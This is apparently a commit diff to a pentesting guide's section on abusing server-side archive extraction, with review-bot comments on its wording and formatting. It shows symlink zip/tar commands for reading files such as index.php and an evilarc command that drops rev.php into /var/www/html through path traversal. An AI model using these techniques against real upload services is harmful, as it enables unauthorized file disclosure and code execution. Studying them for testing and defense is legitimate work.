GitBook: [#2892] update

CPol 2021-12-05 18:16:27 +00:00 committed by gitbook-bot
parent 4015277646
commit 316bcad4b2
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

@ -169,7 +169,7 @@ Heres a top 10 list of things that you can achieve by uploading (from [link](
Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes.
## Zip File Automatically decompressed Upload
## Zip/Tar File Automatically decompressed Upload
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
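Review bot: the heading is changed to "Zip/Tar File Automatically decompressed Upload", but the sentence directly under it still reads "If you can upload a ZIP that is going to be decompressed inside the server", so the title and its first line now disagree. Suggest rewording that sentence to cover both formats (for example "a ZIP or TAR archive"), or leaving the heading alone if only part of the section applies to tar.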
@ -180,6 +180,7 @@ Upload a link containing soft links to other files, then, accessing the decompre
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Decompress in different folders
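Review bot: the added `tar -cvf test.tar symindex.txt` line sits directly under the zip command with nothing marking it as an alternative rather than a second step. A short comment above each command would fix that and explain the asymmetry a reader will notice: zip needs `--symlinks` to keep the link, while tar stores the link itself by default. The fence also has no language tag; `bash` would match the content.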
@ -188,10 +189,11 @@ The decompressed files will be created in unexpected folders.
One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.
An automated exploit to create this kind of files can be found here: [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc)****
```python
python evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
python2 evilarc.py -h
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Some python code to create a malicious zip:
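Review bot: the replacement link line ends in a stray `****` (an empty bold span after the closing parenthesis), which will render as literal asterisks or noise; drop it and keep either the plain link or the bolded one. In the same hunk the fence is tagged `python` although its lines are shell invocations of `python2 evilarc.py`, so `bash` is the accurate tag. The surrounding text still speaks only of the ZIP format while the section heading was widened to Zip/Tar, so it is worth stating whether this directory-escape part applies to tar archives too.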